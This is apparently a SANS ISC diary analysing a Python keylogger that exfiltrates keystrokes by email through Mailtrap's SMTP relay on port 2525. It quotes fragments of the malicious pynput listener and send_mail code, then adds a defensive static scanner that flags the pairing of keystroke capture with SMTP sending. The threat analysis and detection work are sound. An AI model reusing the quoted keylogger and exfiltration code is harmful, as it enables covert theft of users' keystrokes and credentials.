I found another Python keylogger... This is pretty common because Python has plenty of modules to implement this technique in a few lines of code:
    from pynput import keyboard
    from pynput.keyboard import Listener
    ...
    keyboard_listener = keyboard.Listener(on_press=self.save_data)
    with keyboard_listener:
        self.report()
        keyboard_listener.join()
This is not the most interesting part of the malicious script. When data (key presses) are collected, they must be exfiltrated to the attacker's C2. These days, Discord is very popular. I also found many abused Google Mail accounts.
But, in this case, the attacker used another popular online service: mailtrap.io[1]. This service is "an email sandbox to inspect and debug emails in staging, dev, and QA environments before sending them to recipients in production". You may register a free account and get an environment that receives emails for free! Mailtrap provides an authenticated SMTP server through which you send emails to that environment. Here is the code from the malicious script:
    def send_mail(self, email, password, message):
        sender = "Private Person <[email protected]>"
        receiver = "A Test User <[email protected]>"
        m = f"""\
    Subject: main Mailtrap
    To: {receiver}
    From: {sender}
    Keylogger by aydinnyunus\n"""
        m += message
        with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
            server.login(email, password)
            server.sendmail(sender, receiver, message)
Mailtrap accepts emails on the following ports: 25, 465, 587 or 2525. Strangely, the script uses the last one, which stands a good chance of being blocked in corporate environments. Otherwise, it's a nice way to fly below the radar...
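As an added defensive example (not code from the diary or from the malicious script): a small static check, written for this post, that parses a Python file and flags the combination seen above, a keystroke-capture import (pynput) next to an SMTP client (smtplib), and reports any smtplib.SMTP endpoint matching the Mailtrap relay or port 2525. The module names, host and port are the indicators taken from this diary; the sample script is constructed and only mirrors the imports and the SMTP call.

```python
import ast

# Indicators taken from the diary: keystroke-capture module, SMTP client,
# and the Mailtrap relay on its non-standard port.
KEYLOG_MODULES = {"pynput"}
MAIL_MODULES = {"smtplib"}
SUSPECT_HOSTS = {"smtp.mailtrap.io"}
SUSPECT_PORTS = {2525}

# Constructed sample that only mirrors the imports and SMTP call of the diary's script.
SAMPLE = """
import smtplib
from pynput import keyboard
def send_mail(email, password, message):
    with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
        server.login(email, password)
"""

def imported_roots(node):
    """Top-level module names pulled in by an Import/ImportFrom node."""
    if isinstance(node, ast.Import):
        return {alias.name.split(".")[0] for alias in node.names}
    if isinstance(node, ast.ImportFrom) and node.module:
        return {node.module.split(".")[0]}
    return set()

def scan_python_source(source):
    """Flag scripts that combine a keystroke-capture import with an SMTP client."""
    findings = {"keylog_import": False, "smtp_import": False, "smtp_endpoints": []}
    for node in ast.walk(ast.parse(source)):
        roots = imported_roots(node)
        findings["keylog_import"] |= bool(roots & KEYLOG_MODULES)
        findings["smtp_import"] |= bool(roots & MAIL_MODULES)
        # smtplib.SMTP("host", port) or SMTP_SSL(...) called with literal arguments
        if isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if name in ("SMTP", "SMTP_SSL"):
                lits = [a.value for a in node.args if isinstance(a, ast.Constant)]
                host = next((v for v in lits if isinstance(v, str)), None)
                port = next((v for v in lits if isinstance(v, int)), None)
                findings["smtp_endpoints"].append((host, port))
    findings["keylogger_exfil"] = findings["keylog_import"] and findings["smtp_import"]
    return findings

def suspicious_endpoints(findings):
    """Endpoints matching the relay host or port seen in the diary's sample."""
    return [(h, p) for h, p in findings["smtp_endpoints"]
            if h in SUSPECT_HOSTS or p in SUSPECT_PORTS]
```

Run it over a directory of scripts (or a mail gateway's extracted attachments) and treat a hit on both flags plus a Mailtrap endpoint as worth a closer look; the port check alone also catches scripts that relay through other providers on 2525.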
Conclusion: another free online service (ab)used by attackers!
Script SHA256: 9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d, with a VT score of 8/61[2]
[1] https://mailtrap.io
[2] https://www.virustotal.com/gui/file/9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d/detection
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant